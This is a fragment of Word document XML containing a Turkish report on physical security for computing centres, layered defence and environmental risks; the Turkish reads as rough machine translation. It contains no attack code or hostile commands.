          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>6.FİZİKSEL GÜVENLİĞİ BT GÜVENLİK POLİTİKASI İLE BÜTÜNLEŞTİRMEK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">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Bilgiyi koruma politikaları hem fiziksel hem de BT güvenlik gereksinimlerini karşılamalıdır. Politika her ikisini de kapsamalıdır. Yaklaşımda tutarlı olmalı, ancak uygulamada her zaman aynı olmamalıdır. Örneğin, gizli proje bilgilerinin proje ortaklarına güvenli bir şekilde iletilmesini sağlamak için bir politika olduğunu varsayalım. Kağıt dünyası için mühürlü bir zarf yeterli olabilir; ancak dijital dünya için sağlam şifreleme gereklidir. Şüphesiz, dağıtım bisikletçisi bir zarfı açabilir ve içeriği görebilir. </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 xml:space="preserve">Bununla birlikte, İnternet üzerinden veri gönderilirken, kişi onunla temasa geçebilir ve etik dışı bir insana neredeyse hiç bedel ödemeden inanılmaz hızlarda muazzam miktarlarda çoğaltılabilir hatta yeniden dağıtılabilir. </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lastRenderedPageBreak/>
        <w:t xml:space="preserve">“Örneğin, yüksek seviyeli bir politika şöyledir: “Kullanıcılar ağ erişimi için benzersiz bir şekilde tanımlanmalıdır.” Bu, şifreler, parola makbuzları ve parola depolaması standartlarını ortaya koymaktadır. </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68" w:name="_Toc9949870"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>7.BİLGİ İŞLEM MERKEZLERİ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BC393C"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Bilgisayar donanım ve yazılım olanakları ve başta veri hazırlama donanımı olmak üzere öngörülen bilgi işlem hizmetleri için gerekli tüm öteki yardımcı makinelerle donatılmış, yönetici insangücünün yanı sıra dizge çözümleyiciler, izlenceleyiciler, işletmenler vb. gibi bilişim insangücünden oluşan ve içinde bulunduğu örgüte ya da dışarıya bilgi işlem hizmeti sunmayı amaçlayan örgüt.</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Bilgi işlem merkezleri yıllar içinde gelişti, ancak yine de önemli bilgi işlem varlıklarının bulunduğu alan olarak kaldılar.Farklı koruma derecelerine sahiptirler ve</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yönetim algılarına ve içerdikleri varlıklara bağlı olarak koruyucu önlemler.</w:t>
      </w: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Teknik ekibin üyeleri genellikle mesai saatleri dışında bilgi işlem merkezi erişimi talep ediyorlar. Sistemleri yeniden başlatmanız gerekebilir. Yönetim üyeleri aynı zamanda erişim talep edebilirler çünkü şirket, şirket varlıkları üzerinde denetim kontrolü olmasını gerektirir. Ek olarak, bilgisayar odasına erişim</w:t>
      </w:r>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sistemlere hizmet veren satıcı ve müşteri mühendisleri gibi çalışanlara verilmemektedir. Takip etmek yetkili erişim ve minimumda tutulmasını sağlamak bilgi güvenliği için büyük bir görevdir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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8604A3"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69" w:name="_Toc9949871"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>8.BİLGİ İŞLEM MERKEZİ EVRİMİ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169"/>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 xml:space="preserve">Büyük ana bilgisayarların olduğu günlerde, bilgi işlem merkezleri genellikle tüm binaları işgal etti; ilgili personel için. Bunlar, birçok kişinin ihtiyaç duyduğu merkezi bilgi işlem merkezlerinin günleriydi. bir dizi gerekli görevi yerine getirmek. Operatörlerin yazdırma işlemlerini yürütmesi, takması ve çıkarması gerekiyordu bantlar ve ana konsolu yönetin. İşlerin </w:t>
      </w:r>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">kurulması ve programlanması için üretim kontrol kadroları gerekiyordu. İçinde ek olarak, sistem programcıları ve bazı durumlarda sistem geliştiricileri için kadro istediler. Bilgisayar Güvenliği yönetimi zordu, ancak bazı kontroller işlevleri sürdürmek için fiziksel duvarlar yerleştirildi. ayrı. Bu büyük sistemlerden bazıları hala kalıyor; ancak, fiziksel bilgisayar odası görevleri azaltıldı otomasyon ve departman baskısı yoluyla. Dağıtılmış sistemler geliştikçe, sunucular sık ​​sık sistem yöneticileri tarafından yüklendi ve yönetildi. tüm sistem görevlerini yerine getirdi. Bu sistemlerin birçoğu, ofis ortamlarında çalışmak için oluşturulmuştur. ısı ve nem üzerinde sıkı çevresel kontroller için ihtiyaç. Sonuç olarak, sunucular ofislerde bulundu kilitli bir kapının arkasına yerleştirilmeyebilecekleri yer. Bu güvenlik gelişi ile daha da aşınmış Masaüstü bilgisayar, veriler ofis genelinde mevcut olduğunda. Birçok durumda, sunucular kendi ekipmanlarını kontrol etmek isteyen ve yapmayan çeşitli bölümlerde </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80CA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>uygulanmış ve kurulmuş Bürokratik değişim kontrolleri, ters ibrazlar ve kontrol işlemleriyle bilgi işlem personeline geri dönmek istiyorlar. Son kullanıcı ihtiyaçlarına yavaş algılanan yanıt.Yerel ağlar ve dağıtılmış sistemler stratejik önem kazandıkça, daha büyük kullanıcı tabanları elde edildi, ihtiyaç duyuldu yazılım yükseltmeleri ve ara bağlantı, son kullanıcı departmanlarının yönetmesi ve kontrol etmesi zorlaştı sistemler Ayrıca, denetim departmanı olmayan güvenlik gereksinimleri olduğunu fark etti. Bu kritik sistemleri desteklemek için yerine getirildi. Bu, sistemlerin yeniden merkezileşmeye göç etmesine neden oldu kontrol ve merkezi bilgisayar odaları. Bu sistemler çevresel dalgalanmalara dayanabilse de, gereken sayıda sunucu gerekli ısıyı düşük tutmak ve kesintisiz güç ve ağ sağlamak için bazı altyapı planlamaları bağlantı. Ek olarak, işletim sistemleri ve kullanıcı yönetimi görevleri daha zor hale geldi ve desteklemesi için bir operasyon personeli gerektirdi. Ancak, bu sistemler artık bilgisayar odalarındaki uzman kadrolar onları desteklemekte. Baskı işlemleri çoğunlukla ortadan kalktı, Veriler masaüstünde görüntülenir veya basılı kopya için yerel bir yazıcıya gönderilir. Çoğu durumda, bilgisayar merkezleri hala büyük ana bilgisayarları desteklemektedir, ancak çok daha az yer kaplarlar eski makinelerden daha. Bu tesislerin bazıları LAN'ları desteklemek için dönüştürülmüş ve UNIX tabanlı sistemleri dağıtmıştır. Bununla birlikte, erişim kontrolleri, çevre korumaları ve yedek destek altyapısı Kararlılık, güvenlik ve kullanılabilirlik sağlamak için hala yerinde olmalısınız. Güvenlik uygulayıcısı Fiziksel güvenlik önlemlerinin yerinde ve etkili olduğunu.Daha önce belirtildiği gibi, bilgi işlem merkezi genellikle diğer işletme fonksiyonlarını destekleyen bir tesisin bir parçasıdır. Çoğu durumda, bu tesis tüm işi desteklemektedir. Desteklemek için fiziksel güvenlik geliştirilmeli tüm tesis içinde bulunan hesaplama merkezi için özel hususlarla birlikte. Aslında, koruyucu Tüm tesis içinde ve çevresinde uygulanan önlemler, bilgisayar için ek koruma sağlar merkezi.</w:t>
      </w:r>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70" w:name="_Toc9949872"/>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r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>9.KORUYUCU ÖNLEMLER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>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Bilgi işlem tesislerine girişler, kritik bilgi işlem kaynaklarını korumak için kontrol edilmelidir. Masaüstü bilgisayarlar, yerel olarak depolanan değerli bilgilerle genellikle bir gece boyunca kalır. Bazı durumlarda, bu sistemler hassas sistemlerde oturum açmış durumdadır. Hassas verileri olan dizüstü bilgisayarlar gece ve hatta çalışma saatleri sırasında çalınabilir. Değerli bilgi kaynaklarını, insanları ve sistemleri korumak için çeşitli yöntemler ve araçlar göz önünde bulundurulmalıd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Katmanlı bir savunma, bir miktar fazlalık sağlayarak ve genişleterek erişim kontrollerine duyulan güveni arttırır.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Katmanlı bir savunmayı planlayan BT güvenlik uzmanı, üç temel ilkeye ayırır: genişlik, derinlik ve caydırıcılık.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Genişlik kullanılır, çünkü tek bir kontrol türü nadiren açıklıkların hepsini ortadan kaldırır. Örneğin; oturum açma şifresi kullanarak verilere okuma erişimini kontrol etmeye karar verdiğimizi varsayalım. Ancak, veriler İnternet üzerinden gönderilirse, oturum açma şifresi korunmaz. Bu nedenle farklı bir kontrol türü (yani şifreleme) ihtiyaç duyulur. Bu da genişliği temsil eder. </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E77DF4" w:rsidRPr="00BC393C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_Toc9949873"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10.ÇEVRESEL ENDİŞELER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C80CA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Çoğumuz, tesislerimizin nereye yerleştirileceğini belirleme fırsatımız yok çünkü muhtemelen Bilgi güvenliği görevlisi olarak atanmamızdan önce vardı. Ancak, bu bizi engellemez Hangi çevresel risklerin mevcut olduğunu belirlemeye çalışmak ve bunları azaltmak için harekete geçmek. Şanslıysanız tesislerin havayolları gibi tehditlere maruz kalma riskinin azaldığı alanlara taşınmasıyla ilgili girdilere sahip olması, deprem hataları ve taşkınla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72" w:name="_Toc9949874"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10.1.Topluluk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C80CA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Çevredeki topluluk, bilgisayar odası güvenliğine ve risklere katkıda bulunabilir. Sahip olan topluluklar Güçlü polis ve itfaiye hizmetleri tehdit ve olaylara hızlı bir şekilde cevap verebilecek. Düşük suç oranları AU1997_Frame_ch160 Sayfa 1948 14 Kasım 2003 Cuma 12:55 Hesaplama Tesisi Fiziksel Güvenlik 1949 ve güçlü ekonomik faktörler, bilgi işlem tesisleri için güvenliğin yanı sıra en iyi çalışanları cezbetmek. İdeal topluluk bulmak zordur ve çoğu durumda seçme şansınız olmaz bir. Bu topluluktaki diğer işletmeler, patlayıcı işlemler, kimyasal kirleticiler ve gürültü kirliliği gibi tehlikeler sağlayabilir. Topluluk havaalanları, havaalanına yakın olan iniş ve kalkış uçuş yollarına sahip olabilir. tesisi. Suç oranlarının yüksek olması, bilgi işlem tesisini ve sakinlerini de tehdit edebilir. Koruyucu önlemler Bu riskleri hesaba katmak için geliştirilmeleri gerekebilir. Güvenlik pratisyeni, bir ilişki geliştirerek topluluk yeteneklerinin değerini artırabilir. yerel polis ve yangından korunma örgütleri. Bu kuruluşlarla iyi bir ilişki sadece Tesislerin güvenliğine katkıda bulunur, ancak aynı zamanda acil durumlarda personelin güvenliğinin anahtarı olacaktır. Acil durum tatbikatlarına katılmaları ve süreci eleştirmeleri için davet edilmelidirler. Yerel polis, tesisleri gezmeye ve tesislerin yerleşimini anlamaya davet edilmeli ve koruyucu önlemler yerinde. Aslında, mevcut durum için önerilen iyileştirmeler sağlamaları istenmelidir. kullandığın önlemler. Yerel bir koruma servisiniz varsa, bir çalışanlarının bulunması şarttır. yerel polis yetkilileriyle ilişki. İtfaiye, yangından korunma önlemlerini gözden geçirmekten ve iyileştirmeye yardımcı olmaktan mutluluk duyacaktır. onlar. Birçok durumda, yangın söndürücüler ve diğer yangın söndürme gibi şeyleri incelemek için ısrar edecekler sistemleri. İtfaiyenin tesis yerleşimini ve giriş noktalarını anlaması çok önemlidir. çıkış. Ayrıca, kullanılan yangın söndürme sistemlerini ve bunlar için kontrollerin yerini bilmelidirler. Sistemle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73" w:name="_Toc9949875"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.2.Doğanın Davranışları</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>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Çoğu durumda, Tabiat Ana'nın ruh halini veya gazabının sonuçlarını kontrol edemeyiz. Ancak yapabilirizen muhtemel olaylara hazırlanın ve etkilerini azaltmaya çalışın. Deprem tehditleri ek gerektirebilirSunucuların ve çevresel aygıtların devrilme nedeniyle tahrip olmalarını önlemek için destekleme ve bağlama kayışları</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düşüyor. Karter pompalarının kurulması ve yukarıdaki ekipmanların yerleştirilmesi ile taşma riskleri azaltılabilirzemin kat. Fırtına ve fırtınalardan kaynaklanan elektrik kesintileri, kesintisiz güç kaynağı (UPS) sistemleri ve tesislerin uygun şekilde topraklanması ile ele alınabili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lastRenderedPageBreak/>
        <w:t>Doğal afetlerin kilit noktası, çoğu durumda yok edilememeleridir. Çareler olmalı</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r olayın meydana gelme ihtimaline ve buna uygun bir şekilde karşılık verilmesine ilişkin hükümler esas alınarak tasarlandı. Tümündedurumlarda, tesis içi depolama veya yedek sistemler ile veri yedeklemesi yapay veya doğal olarak hazırlanmalıd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fetle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74" w:name="_Toc9949876"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.3.Diğer Dış Riskler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="174"/>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11 Eylül 2001’de meydana gelen olaylara kadar isyanlarla ilgili fiziksel güvenlik kaygıları, işyerişiddet ve yerel bozulmalar. Ülkede terör eylemleri fikri uzak ama mümkün görünüyordu. Dan beriO tarihte, terörizm sadece mümkün değil, aynı zamanda olasıdır. Tesisleri çimento kullanarak korumaya yönelik önlemle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engeller, park edilmeyen bölgeler ve güvenlikli erişim kapıları hem yönetim hem de</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Personel. Bu önlemlerin getirdiği maliyet ve uygunsuzluk birdenbire daha kabul edilebilir.Tesislerimizin birçoğu teröristlerin hedef alanın dışında olduğu düşünülen bölgelerde bulunmaktad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Saldırı. Ancak, Oklahoma Şehri bombalaması düşük hedef bölgede gerçekleşti. Şarbon problemleriboşaltılması muhtemel pek çok olanak var. Biyo-terörizm veya nükleer santrallere saldırı riskleri şimdi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> g</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80CA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>erçek ve mümkün olduğu düşünüldü ve hemen hemen her şehirde görülebilir. Alternatif site planlaması dikkate alınmalıdır</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iş sürekliliği ve fiziksel güvenlik planlarında.</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75" w:name="_Toc9949877"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.4.Tesis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>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lgi işlem ortamlarımızı destekleyen tesisler, çekirdek sağlamada kur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uluş için kritik öneme sahiptir. T</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80CA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>icari hizmetler ve fonksiyonlar. Bugün, işletmelerini işletmek ve müşterilerine hizmet sağlamak için bilgisayar ve telekomünikasyon kaynaklarına güvenmeyen çok az sayıda kuruluş var. Bu gerektirir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80CA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>esisin hem fiziksel hem de mantıksal yönleri üzerinde güvenlik. Aşağıdaki tartışmaBilgi işlem merkezinde kullanım için göz önünde bulundurulması gereken fiziksel koruyucu önlemler ve bu</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onu kuşat.</w:t>
      </w:r>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BC393C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="_Toc9949878"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10.5.Koruma Katmanları</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C80CA5"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p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A9330B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9330B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu senaryoda internet tarafından başlamak gerekirse öncelikle dış güvenlik duvarı tarafından istenmeyen yöndeki trafik kesilecektir. Bilinen ataklara karşı koruma sağlayan IPS sistemleri ile hem internet taraf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ından hem de diğer ağlardan</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9330B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gele</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cek trafik engellenebilmektedir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A9330B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu önlemlere ek olarak yük dengeleyici                                                        ile erişilebilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lik artırılmakta web </w:t>
      </w:r>
      <w:r w:rsidRPr="00A9330B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uygulama güvenlik duvarı ile de dah</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A9330B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>karmaşık web tehditlerine karş</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ı koruma </w:t>
      </w:r>
      <w:r w:rsidRPr="00A9330B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sağlanmaktadır. En son katman savunma                                                                                   olarak istemci I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PS ve istemci güvenlik</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9330B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> duvarı kullanılmıştır. Bulunduğu ağda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">n         </w:t>
      </w:r>
      <w:r w:rsidRPr="00A9330B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                  gelecek olası bir saldırı ba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hsedilen ağ </w:t>
      </w:r>
      <w:r w:rsidRPr="00A9330B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cihazlardan geçmeyeceği tek savunma olarak                                                                                                  istemci güvenlik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ürünleri kalmaktadır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9330B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uygulanan bu katmanlı yapı ile saldırıların                                                               gelebilecekleri tüm yerler ve nitelik olar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ak </w:t>
      </w:r>
      <w:r w:rsidRPr="00A9330B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bilinen saldırıların birçoğu engellenebilecektir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
